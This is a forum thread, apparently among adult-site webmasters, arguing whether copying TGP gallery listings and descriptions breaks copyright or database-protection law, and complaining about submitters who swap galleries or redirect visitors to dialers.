Luckily we don't have to agree ;-)... A link-site taking my listings is easily taken care of. If he's copying descriptions it's a violation of author's rights. I own the copyrights to my listing (filed it) and there's always the database protection laws. Like I said, a webmaster stealing my links can be taken care off very easily...

Gotys takes these galleries from other TGPs. Although tgps claim this breaks their TOS. They do nothing, and continue to trade with both his sites.

I think that the gallery links are fair game, but not the descriptions of course. I don't run a tgp btw, so I have no idea about the work invloved in listings. The point of the example, though, is that people tend to justify their behavior by the size of their site or their wallet.

Only "The Shemp" came out and said that it was wrong to steal his listings, all others remained silent.

I'm curious to hear your opinion on this. What action will you take?

Upon an e-mail I got about this site I checked it out, but couldn't find any of my links listed there... I took action against people taken my links in the past. One case made it to court. I won 'cause of the (international) database protection laws

So, what do you say to the people that support your cause, i.e. someone breaking your TOS; however, they do not speak out against a similar breaking of TOS, as in the case of cliphunter.

In both cases the TOS are not law.

Mind you, I support cliphunters right to take galleries, just not verbatim descriptions.

The way this cheater is submitting galleries to The Hun looks like he wants to take more than half of The Hun daily listings.

I'm not offering service to anyone taking my links, so this has nothing to do with TOS... this is about law. 3 of 'em. Database protection laws, copyright laws and author's rights. All very clear laws, and very easy to enfource.

I HIGHLY doubt suing a gallery submitter who changes his galleries would stand up in court. A TGP simply links to other people's sites. What is on those sites at any given time is up to them. A TGP owner has absolutely no legal right to say what someone can and can't do with their own personal webspace they've bought.

TGP's want a LEGAL right to block gallery submitters from changing their galleries? Then have each and every gallery submitter FedEx a contract agreement stating they won't change their gallery after it's approved.

You'd never win in court without such a legal understanding as a signed contract.

This is like saying a phonebook company against listing "immoral" businesses could sue a business 2 months after the book is published because they "changed their business". Give me a break.

And for the record... I am totally against changing galleries (or cheating of any kind), and I'd never do it. I'm just looking at this from a common sense perspective. Running a TGP is a bitch sometimes, and running one with 1m visitors much be a bitch all the time. Deal with it.

The Hun, why not create a system where the webmaster is rated by your script ?

I submit to you since 1999 (now using my real name - Renato - since you ask for it in the form).

For example:

1 star: Had less than 10 galleries approved.
2 stars: 11-20 galleries approved.
3 stars: 21-30 galleries approved.
4 stars: 31-50 galleries approved.
5 stars: 51+ galleries approved.

You could maintain like 30% of the galleries for those with 1 or 2 stars. The other webmasters would take the rest of the non-paid listings.
If the guy is a cheater, he would have just 1 gallery approved of course (so less chances to have his galleries listed)

Just a sugestion.

Redirecting people straight to dialers without an explanation of what they are. Linking people who are under the impression they are about to receive a free gallery to a dialer so they'll click, taking adventage of the trust I build up, ruining good reputation, misleading advertising... I don't know if these are all illegal, but throw enough mud and something will stick. I don't mind paying a (good) lawyer if it comes down to it. A cheater like this is costing me money....


I'm talking about simple copyright laws, database protection laws and author's rights. Look 'em up in the legal documents, they should be all there...

It seems, using similar logic as the document presents, as long as some one collects links from a variety of publically available sources that link to publically available sites and reorganizes thier directory in an original manner they are ok. After all, this is what a search engine does.

However, I'm still interested in hearing your opinion on the specific case of cliphunter. As long as he doesn't use your links you don't care?
